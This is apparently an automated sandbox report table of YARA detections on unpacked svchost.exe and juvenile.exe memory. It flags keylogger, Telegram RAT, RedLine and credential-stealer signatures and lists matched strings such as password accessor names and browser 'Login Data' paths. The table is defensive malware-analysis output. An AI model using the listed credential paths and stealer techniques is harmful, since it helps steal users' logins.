11.2.svchost.exe.7d30f20.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.svchost.exe.7d30f20.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.svchost.exe.7d30f20.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33664:$a1: get_encryptedPassword 0x33638:$a2: get_encryptedUsername 0x336fc:$a3: get_timePasswordChanged 0x33614:$a4: get_passwordField 0x3367a:$a5: set_encryptedPassword 0x33447:$a7: get_logins 0x2ed32:$a10: KeyLoggerEventArgs 0x2ed01:$a11: KeyLoggerEventArgsEventHandler 0x3351b:$a13: _encryptedPassword
11.2.svchost.exe.7d30f20.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca5d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccba:$a4: \Orbitum\User Data\Default\Login Data 0x3d699:$a5: \Kometa\User Data\Default\Login Data
11.2.svchost.exe.7d30f20.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31251:$s1: UnHook 0x311ed:$s2: SetHook 0x31226:$s3: CallNextHook 0x311b5:$s4: _hook
8.3.svchost.exe.326d000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.3.svchost.exe.366e000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.3.svchost.exe.366e000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.3.svchost.exe.366e000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.svchost.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
8.3.svchost.exe.326d000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.3.svchost.exe.326d000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.3.svchost.exe.326d000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.3.svchost.exe.326d000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34384:$a1: get_encryptedPassword 0x34358:$a2: get_encryptedUsername 0x3441c:$a3: get_timePasswordChanged 0x34334:$a4: get_passwordField 0x3439a:$a5: set_encryptedPassword 0x34167:$a7: get_logins 0x2fa52:$a10: KeyLoggerEventArgs 0x2fa21:$a11: KeyLoggerEventArgsEventHandler 0x3423b:$a13: _encryptedPassword
8.3.svchost.exe.326d000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.3.svchost.exe.326d000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.3.svchost.exe.326d000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.3.svchost.exe.326d000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36184:$a1: get_encryptedPassword 0x36158:$a2: get_encryptedUsername 0x3621c:$a3: get_timePasswordChanged 0x36134:$a4: get_passwordField 0x3619a:$a5: set_encryptedPassword 0x35f67:$a7: get_logins 0x31852:$a10: KeyLoggerEventArgs 0x31821:$a11: KeyLoggerEventArgsEventHandler 0x3603b:$a13: _encryptedPassword
8.3.svchost.exe.326d000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3feda:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f57d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7da:$a4: \Orbitum\User Data\Default\Login Data 0x401b9:$a5: \Kometa\User Data\Default\Login Data
8.3.svchost.exe.326d000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d71:$s1: UnHook 0x33d0d:$s2: SetHook 0x33d46:$s3: CallNextHook 0x33cd5:$s4: _hook
11.2.svchost.exe.7d30000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.svchost.exe.7d30000.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.svchost.exe.7d30000.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.7e90000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.svchost.exe.7e90000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.svchost.exe.7e90000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.svchost.exe.7e90000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.7e00f20.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.svchost.exe.7e00f20.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.svchost.exe.7e00f20.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.7e00f20.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33664:$a1: get_encryptedPassword 0x33638:$a2: get_encryptedUsername 0x336fc:$a3: get_timePasswordChanged 0x33614:$a4: get_passwordField 0x3367a:$a5: set_encryptedPassword 0x33447:$a7: get_logins 0x2ed32:$a10: KeyLoggerEventArgs 0x2ed01:$a11: KeyLoggerEventArgsEventHandler 0x3351b:$a13: _encryptedPassword
8.2.svchost.exe.7e00f20.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca5d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccba:$a4: \Orbitum\User Data\Default\Login Data 0x3d699:$a5: \Kometa\User Data\Default\Login Data
8.2.svchost.exe.7e00f20.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31251:$s1: UnHook 0x311ed:$s2: SetHook 0x31226:$s3: CallNextHook 0x311b5:$s4: _hook
11.2.svchost.exe.7d30000.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34384:$a1: get_encryptedPassword 0x34358:$a2: get_encryptedUsername 0x3441c:$a3: get_timePasswordChanged 0x34334:$a4: get_passwordField 0x3439a:$a5: set_encryptedPassword 0x34167:$a7: get_logins 0x2fa52:$a10: KeyLoggerEventArgs 0x2fa21:$a11: KeyLoggerEventArgsEventHandler 0x3423b:$a13: _encryptedPassword
11.2.svchost.exe.3774f2e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.svchost.exe.3774f2e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.svchost.exe.3774f2e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.7e90000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
8.2.svchost.exe.7e90000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
8.2.svchost.exe.7e90000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
11.2.svchost.exe.7d30000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e0da:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d77d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d9da:$a4: \Orbitum\User Data\Default\Login Data 0x3e3b9:$a5: \Kometa\User Data\Default\Login Data
11.2.svchost.exe.7d30000.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31f71:$s1: UnHook 0x31f0d:$s2: SetHook 0x31f46:$s3: CallNextHook 0x31ed5:$s4: _hook
8.3.svchost.exe.326d000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e0da:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d77d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d9da:$a4: \Orbitum\User Data\Default\Login Data 0x3e3b9:$a5: \Kometa\User Data\Default\Login Data
11.2.svchost.exe.3774f2e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33664:$a1: get_encryptedPassword 0x33638:$a2: get_encryptedUsername 0x336fc:$a3: get_timePasswordChanged 0x33614:$a4: get_passwordField 0x3367a:$a5: set_encryptedPassword 0x33447:$a7: get_logins 0x2ed32:$a10: KeyLoggerEventArgs 0x2ed01:$a11: KeyLoggerEventArgsEventHandler 0x3351b:$a13: _encryptedPassword
11.3.svchost.exe.366e000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34384:$a1: get_encryptedPassword 0x34358:$a2: get_encryptedUsername 0x3441c:$a3: get_timePasswordChanged 0x34334:$a4: get_passwordField 0x3439a:$a5: set_encryptedPassword 0x34167:$a7: get_logins 0x2fa52:$a10: KeyLoggerEventArgs 0x2fa21:$a11: KeyLoggerEventArgsEventHandler 0x3423b:$a13: _encryptedPassword
11.3.svchost.exe.366e000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e0da:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d77d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d9da:$a4: \Orbitum\User Data\Default\Login Data 0x3e3b9:$a5: \Kometa\User Data\Default\Login Data
8.3.svchost.exe.326d000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31f71:$s1: UnHook 0x31f0d:$s2: SetHook 0x31f46:$s3: CallNextHook 0x31ed5:$s4: _hook
11.3.svchost.exe.366e000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31f71:$s1: UnHook 0x31f0d:$s2: SetHook 0x31f46:$s3: CallNextHook 0x31ed5:$s4: _hook
11.2.svchost.exe.3774f2e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca5d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccba:$a4: \Orbitum\User Data\Default\Login Data 0x3d699:$a5: \Kometa\User Data\Default\Login Data
11.2.svchost.exe.3774f2e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31251:$s1: UnHook 0x311ed:$s2: SetHook 0x31226:$s3: CallNextHook 0x311b5:$s4: _hook
8.2.svchost.exe.7e00f20.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.svchost.exe.7e00f20.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.svchost.exe.7e00f20.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.svchost.exe.7e00f20.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.7e00f20.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
8.2.svchost.exe.7e00f20.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
8.2.svchost.exe.7e00f20.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
8.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.3374f2e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
8.2.svchost.exe.3374f2e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
8.2.svchost.exe.3374f2e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
11.2.svchost.exe.7d30000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.svchost.exe.7d30000.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.svchost.exe.7d30000.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.svchost.exe.7d30000.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.svchost.exe.7d30000.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36184:$a1: get_encryptedPassword 0x36158:$a2: get_encryptedUsername 0x3621c:$a3: get_timePasswordChanged 0x36134:$a4: get_passwordField 0x3619a:$a5: set_encryptedPassword 0x35f67:$a7: get_logins 0x31852:$a10: KeyLoggerEventArgs 0x31821:$a11: KeyLoggerEventArgsEventHandler 0x3603b:$a13: _encryptedPassword
11.2.svchost.exe.7d30000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3feda:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f57d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7da:$a4: \Orbitum\User Data\Default\Login Data 0x401b9:$a5: \Kometa\User Data\Default\Login Data
11.2.svchost.exe.7d30000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d71:$s1: UnHook 0x33d0d:$s2: SetHook 0x33d46:$s3: CallNextHook 0x33cd5:$s4: _hook
8.3.svchost.exe.326df20.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.3.svchost.exe.326df20.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.3.svchost.exe.326df20.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.3.svchost.exe.326df20.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.3.svchost.exe.326df20.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
8.3.svchost.exe.326df20.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
8.3.svchost.exe.326df20.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
11.2.svchost.exe.8100000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.svchost.exe.8100000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.svchost.exe.8100000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.svchost.exe.8100000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33664:$a1: get_encryptedPassword 0x33638:$a2: get_encryptedUsername 0x336fc:$a3: get_timePasswordChanged 0x33614:$a4: get_passwordField 0x3367a:$a5: set_encryptedPassword 0x33447:$a7: get_logins 0x2ed32:$a10: KeyLoggerEventArgs 0x2ed01:$a11: KeyLoggerEventArgsEventHandler 0x3351b:$a13: _encryptedPassword
11.2.svchost.exe.8100000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca5d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccba:$a4: \Orbitum\User Data\Default\Login Data 0x3d699:$a5: \Kometa\User Data\Default\Login Data
11.2.svchost.exe.8100000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31251:$s1: UnHook 0x311ed:$s2: SetHook 0x31226:$s3: CallNextHook 0x311b5:$s4: _hook
8.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.3374f2e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33664:$a1: get_encryptedPassword 0x33638:$a2: get_encryptedUsername 0x336fc:$a3: get_timePasswordChanged 0x33614:$a4: get_passwordField 0x3367a:$a5: set_encryptedPassword 0x33447:$a7: get_logins 0x2ed32:$a10: KeyLoggerEventArgs 0x2ed01:$a11: KeyLoggerEventArgsEventHandler 0x3351b:$a13: _encryptedPassword
8.2.svchost.exe.3374f2e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca5d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccba:$a4: \Orbitum\User Data\Default\Login Data 0x3d699:$a5: \Kometa\User Data\Default\Login Data
8.2.svchost.exe.3374f2e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31251:$s1: UnHook 0x311ed:$s2: SetHook 0x31226:$s3: CallNextHook 0x311b5:$s4: _hook
8.2.svchost.exe.7e90000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.svchost.exe.7e90000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.svchost.exe.7e90000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.7e90000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33664:$a1: get_encryptedPassword 0x33638:$a2: get_encryptedUsername 0x336fc:$a3: get_timePasswordChanged 0x33614:$a4: get_passwordField 0x3367a:$a5: set_encryptedPassword 0x33447:$a7: get_logins 0x2ed32:$a10: KeyLoggerEventArgs 0x2ed01:$a11: KeyLoggerEventArgsEventHandler 0x3351b:$a13: _encryptedPassword
8.2.svchost.exe.7e90000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca5d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccba:$a4: \Orbitum\User Data\Default\Login Data 0x3d699:$a5: \Kometa\User Data\Default\Login Data
8.2.svchost.exe.7e90000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31251:$s1: UnHook 0x311ed:$s2: SetHook 0x31226:$s3: CallNextHook 0x311b5:$s4: _hook
8.2.svchost.exe.7e00000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.svchost.exe.7e00000.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.svchost.exe.7e00000.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.svchost.exe.7e00000.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.7e00000.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36184:$a1: get_encryptedPassword 0x36158:$a2: get_encryptedUsername 0x3621c:$a3: get_timePasswordChanged 0x36134:$a4: get_passwordField 0x3619a:$a5: set_encryptedPassword 0x35f67:$a7: get_logins 0x31852:$a10: KeyLoggerEventArgs 0x31821:$a11: KeyLoggerEventArgsEventHandler 0x3603b:$a13: _encryptedPassword
8.2.svchost.exe.7e00000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3feda:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f57d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7da:$a4: \Orbitum\User Data\Default\Login Data 0x401b9:$a5: \Kometa\User Data\Default\Login Data
8.2.svchost.exe.7e00000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d71:$s1: UnHook 0x33d0d:$s2: SetHook 0x33d46:$s3: CallNextHook 0x33cd5:$s4: _hook
11.3.svchost.exe.366ef20.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.3.svchost.exe.366ef20.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.3.svchost.exe.366ef20.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.3.svchost.exe.366ef20.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.3.svchost.exe.366ef20.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
11.3.svchost.exe.366ef20.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
11.3.svchost.exe.366ef20.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
11.2.svchost.exe.3774f2e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.svchost.exe.3774f2e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.svchost.exe.3774f2e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.svchost.exe.3774f2e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.svchost.exe.3774f2e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
11.2.svchost.exe.3774f2e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
11.2.svchost.exe.3774f2e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
10.2.juvenile.exe.3c60000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
